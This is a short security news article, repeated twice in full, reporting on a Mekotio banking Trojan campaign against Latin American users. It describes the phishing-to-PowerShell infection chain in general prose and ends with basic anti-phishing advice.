Mekotio is an old modular banking Trojan that had targeted Latin American countries, but recently made a comeback with stealthy and evasive techniques.

According to Check Point researchers, over 100 attacks has been detected in recent weeks using the new technique, with the infection starting out and distributed with a phishing email having a link to a zip file or a zip archive as an attachment.

The main characteristics of these banking Trojans, such as Mekotio, is the modular attack that gives the attackers the ability to change just a small part of the whole to avoid detection.

How Mekotio new attack flow is carried out



The infection starts with a phishing email containing a link to a zip attachment, which lures the victim into downloading and extracting the zip content.



If the victim clicks on the zip content, the malicious batch script will be executed, that runs a “PowerShell Download Cradles” which downloads and runs a PowerShell script on the memory.

The PowerShell script checks if the target is located in Latin America and makes sure it is not running in a virtual machine. It then sets up persistence in the victim’s operating system by downloading a secondary zip archive.

Check Point researchers believe that the main cybercrime groups behid the new campaigns are operating from Brazil and that they collaborated with Spanish gangs which were recently arrested to distribute malwares. But the arrest did not stop the main cybercrime groups, rather it only stopped the activity of the Spanish gangs.

How to Mitigate against such Banking Trojan like Mekotio?



As threat actors continue to adopt various evasive techniques to avoid detection, with social engineering tricks that lure victims to give up their online banking data, getting more pervasive. Therefore, the most important advice is for users not to click on links that come from any unknown source.

And also beware of lookalike domains, spelling errors in emails or site address, and unfamiliar email senders, especially if they prompt for certain actions that are unusual.

Mekotio Banking Trojan Returns with Stealthy and Evasive Techniques

Mekotio is an old modular banking Trojan that had targeted Latin American countries, but recently made a comeback with stealthy and evasive techniques.

According to Check Point researchers, over 100 attacks has been detected in recent weeks using the new technique, with the infection starting out and distributed with a phishing email having a link to a zip file or a zip archive as an attachment.

The main characteristics of these banking Trojans, such as Mekotio, is the modular attack that gives the attackers the ability to change just a small part of the whole to avoid detection.

How Mekotio new attack flow is carried out



The infection starts with a phishing email containing a link to a zip attachment, which lures the victim into downloading and extracting the zip content.



If the victim clicks on the zip content, the malicious batch script will be executed, that runs a “PowerShell Download Cradles” which downloads and runs a PowerShell script on the memory.

The PowerShell script checks if the target is located in Latin America and makes sure it is not running in a virtual machine. It then sets up persistence in the victim’s operating system by downloading a secondary zip archive.

Check Point researchers believe that the main cybercrime groups behid the new campaigns are operating from Brazil and that they collaborated with Spanish gangs which were recently arrested to distribute malwares. But the arrest did not stop the main cybercrime groups, rather it only stopped the activity of the Spanish gangs.

How to Mitigate against such Banking Trojan like Mekotio?



As threat actors continue to adopt various evasive techniques to avoid detection, with social engineering tricks that lure victims to give up their online banking data, getting more pervasive. Therefore, the most important advice is for users not to click on links that come from any unknown source.

And also beware of lookalike domains, spelling errors in emails or site address, and unfamiliar email senders, especially if they prompt for certain actions that are unusual.

No comments